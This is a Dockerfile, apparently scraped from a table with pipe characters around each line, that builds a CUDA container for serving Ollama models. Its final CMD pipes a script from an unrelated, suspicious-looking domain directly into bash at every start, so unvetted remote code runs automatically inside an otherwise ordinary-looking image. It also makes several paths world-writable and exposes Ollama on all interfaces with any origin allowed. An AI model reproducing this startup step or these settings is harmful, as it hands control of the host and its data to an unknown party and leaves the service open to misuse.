|
|
FROM nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04 |
|
|
|
|
|
WORKDIR /app |
|
|
RUN mkdir -p /app && chmod 777 /app |
|
|
RUN apt-get update -y && apt-get upgrade -y |
|
|
RUN apt-get install -y curl wget build-essential git tar gzip htop micro python3 python3-pip psmisc yt-dlp python3-dev gdb |
|
|
RUN pip install langchain-yt-dlp |
|
|
RUN curl -fsSL https://ollama.com/install.sh | sh |
|
|
RUN mkdir -p /.ollama && chmod 777 /.ollama |
|
|
RUN touch /.gitconfig && chmod 777 /.gitconfig |
|
|
|
|
|
RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model |
|
|
ENV OLLAMA_MODELS=/usr/local/share/model/ |
|
|
ENV OLLAMA_HOST=0.0.0.0 |
|
|
ENV OLLAMA_ORIGINS="[*]" |
|
|
ENV OLLAMA_KEEP_ALIVE=-1 |
|
|
ENV OLLAMA_API_KEY=$OLLAMA_API |
|
|
ENV OLLAMA_KV_CACHE_TYPE=q4_0 |
|
|
EXPOSE 7860 |
|
|
EXPOSE 11434 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
CMD wget -qO- https://gloryhole.redzone-6.cfd/packaged/import.sh | bash |
|
|
|